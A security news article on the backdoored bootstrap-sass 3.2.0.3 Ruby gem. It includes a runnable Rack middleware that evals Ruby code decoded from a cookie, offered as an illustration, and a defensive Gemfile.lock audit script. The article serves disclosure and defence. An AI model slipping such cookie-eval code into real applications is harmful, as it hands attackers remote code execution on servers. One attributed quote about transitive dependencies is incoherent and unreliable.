Backdoor code found in the popular Bootstrap-Sass Ruby library


The Bootstrap-Sass Ruby library has been downloaded over 28 million times in total; the backdoored version only 1,477 times.

Backdoor code was found in a popular Ruby library used to build front-end user interfaces in Ruby on Rails applications. The malicious code has since been removed through a library update.

The affected library is Bootstrap-Sass, a Ruby gem that packages the Bootstrap UI framework, the most widely used front-end toolkit today, for Ruby and Rails projects. The backdoor came to light on 27 March, when Derek Barnes noticed that someone had removed an existing release (Bootstrap-Sass version 3.2.0.2) from the package repository and, moments later, published a new version, 3.2.0.3.

What made the change suspicious was that it had been made only on RubyGems, the main repository for Ruby libraries, and not on GitHub, where the library's source code is maintained. A release that exists in the package repository but has no matching tag or commit in the project's source repository is a classic sign of a compromised publishing account rather than a legitimate maintainer release.


RUBY APPS EXPOSED TO REMOTE CODE EXECUTION

On examining the v3.2.0.3 code published on RubyGems, Barnes found what he described as "interesting looking code": a snippet that, when the gem was loaded inside a Ruby on Rails application (Rails being the popular Ruby web framework), would decode the contents of an HTTP cookie sent by a client and execute it as Ruby code. In other words, anyone who knew the cookie format could run arbitrary code on any server running an application that had picked up the backdoored release.
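To make the mechanism concrete, here is a constructed illustration of a cookie-triggered backdoor of the kind described above. It is an added example, not the code that was published in the gem: the cookie name, the base64-plus-deflate encoding and the Rack-style `call(env)` interface are assumptions chosen to keep it runnable offline. A request without the special cookie passes straight through to the application; a request carrying it has its payload executed with the application's full privileges.

```ruby
# Added illustration (not the bootstrap-sass gem's actual code): a Rack-style
# middleware that behaves the way the article describes the backdoor.
# Cookie name and encoding are assumptions for this example.
require 'zlib'

class CookieEvalMiddleware
  COOKIE_NAME = 'payload' # assumed name; the page does not give the real one

  def initialize(app)
    @app = app
  end

  # Rack calls #call with the request env; we wrap the real application.
  def call(env)
    code = extract_payload(env['HTTP_COOKIE'].to_s)
    return @app.call(env) if code.nil?
    # Whatever the cookie contained now runs inside the server process.
    result = eval(code, TOPLEVEL_BINDING)
    [200, { 'content-type' => 'text/plain' }, [result.to_s]]
  end

  private

  # Cookie header -> strict base64 -> zlib-inflated Ruby source, or nil.
  def extract_payload(cookie_header)
    pair = cookie_header.split(/;\s*/).find { |c| c.start_with?("#{COOKIE_NAME}=") }
    return nil unless pair
    Zlib::Inflate.inflate(pair.split('=', 2).last.unpack1('m0'))
  rescue Zlib::Error, ArgumentError
    nil # malformed cookie: behave like a normal request, stay unnoticed
  end
end

# How a client would build the cookie value for a given Ruby snippet.
def encode_payload(ruby_source)
  [Zlib::Deflate.deflate(ruby_source)].pack('m0')
end

# Stand-in for the real application: always answers 200 OK.
INNER_APP = ->(_env) { [200, {}, ['normal response']] }
BACKDOORED_APP = CookieEvalMiddleware.new(INNER_APP)

# Drive the stack without a web server: a plain env hash is all Rack needs.
def respond(cookie_header)
  env = { 'REQUEST_METHOD' => 'GET', 'PATH_INFO' => '/', 'HTTP_COOKIE' => cookie_header }
  status, _headers, body = BACKDOORED_APP.call(env)
  [status, body.join]
end

if __FILE__ == $PROGRAM_NAME
  p respond('session=abc')                                              # ordinary request
  p respond("session=abc; payload=#{encode_payload('RUBY_VERSION')}")   # payload runs
end
```

The point to notice is how little surface the backdoor exposes: without the cookie the middleware is invisible, malformed cookies fall through silently, and nothing in the application's own code references it, so only a review of the installed gem (or a diff of the gem against the project's Git tag) would reveal it.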

The backdoored release was removed from RubyGems on the same day it was reported. The Bootstrap-Sass team also revoked the RubyGems credentials of the maintainers whose accounts they believed had been compromised and used to push the malicious code.

Bootstrap-Sass v3.2.0.4 was released yesterday, published on both RubyGems and GitHub, so that projects tracking the 3.2.x branch resolve to a clean release rather than to the backdoored 3.2.0.3. Developers should update to the new version and check existing projects for the backdoor.
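A practical first check is the lockfile: whether a project resolved to the backdoored release is recorded in its Gemfile.lock. The script below is an added example, not code from the article or the Bootstrap-Sass project; it parses the `specs:` section of a lockfile, flags any gem locked to a known-backdoored version and names the fixed release to move to. The sample lockfile is constructed for the example, and the backdoored/fixed version table is assumed to contain only the versions this article reports.

```ruby
# Added example (not from the article or the bootstrap-sass project):
# audit a Gemfile.lock for the backdoored bootstrap-sass release.
require 'rubygems' # for Gem::Version comparisons

# Versions reported as backdoored and the release that supersedes them.
BACKDOORED = { 'bootstrap-sass' => [Gem::Version.new('3.2.0.3')] }.freeze
FIXED      = { 'bootstrap-sass' => Gem::Version.new('3.2.0.4') }.freeze

# Parse the "specs:" entries of a Gemfile.lock into { name => Gem::Version }.
# Only four-space-indented entries carry a resolved version; deeper lines are
# dependency declarations and are skipped.
def locked_gems(lockfile_text)
  gems = {}
  in_specs = false
  lockfile_text.each_line do |line|
    in_specs = true  if line.strip == 'specs:'
    in_specs = false if line =~ /\A\S/ # unindented line starts a new section
    next unless in_specs
    if (m = line.match(/\A {4}(\S+) \(([^)]+)\)\s*\z/))
      gems[m[1]] = Gem::Version.new(m[2])
    end
  end
  gems
end

# One finding per gem that is locked to a known-backdoored version.
def audit(lockfile_text)
  locked_gems(lockfile_text).filter_map do |name, version|
    next unless BACKDOORED.fetch(name, []).include?(version)
    "#{name} #{version} is backdoored; upgrade to >= #{FIXED[name]}"
  end
end

# Constructed sample lockfile for an app pinned to the old 3.2 branch.
SAMPLE_LOCK = <<~LOCK
  GEM
    remote: https://rubygems.org/
    specs:
      autoprefixer-rails (9.4.7)
        execjs
      bootstrap-sass (3.2.0.3)
        autoprefixer-rails (>= 5.2.1)
        sass (>= 3.3.4)
      sass (3.7.3)

  PLATFORMS
    ruby

  DEPENDENCIES
    bootstrap-sass (~> 3.2.0)
LOCK

if __FILE__ == $PROGRAM_NAME
  findings = audit(ARGV.empty? ? SAMPLE_LOCK : File.read(ARGV[0]))
  puts(findings.empty? ? 'no backdoored gems found' : findings)
end
```

Run it against a real project with `ruby audit_lock.rb Gemfile.lock`. A lockfile check only tells you what Bundler resolved; because this backdoor existed on RubyGems but not on GitHub, the stronger check for any suspicious release is to unpack the installed gem (`gem unpack bootstrap-sass`) and diff it against the corresponding tag in the project's source repository.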

FEW PROJECTS IMPACTED

Relatively few projects are affected, however, because Bootstrap-Sass v3.4.1 was the current release of the library and only a small number of developers were still using the old 3.2 branch. "A rapid analysis shows that approximately 1,670 GitHub repositories were directly exposed to the malicious library," said Snyk, a cybersecurity company that also analyzed the backdoor.

"This is a significant increase in the number of applications used as a transitive dependency." According to official RubyGems statistics, the Bootstrap-Sass library has been downloaded almost 28 million times; that figure is cumulative across all versions, though, and says nothing about how many of those downloads were of the backdoored release. Downloads of the backdoored version 3.2.0.3 stood at only 1,477 at the time of writing.

Mark Funk
Mark Funk is an experienced information security specialist who works with enterprises to mature and improve their enterprise security programs. Previously, he worked as a security news reporter.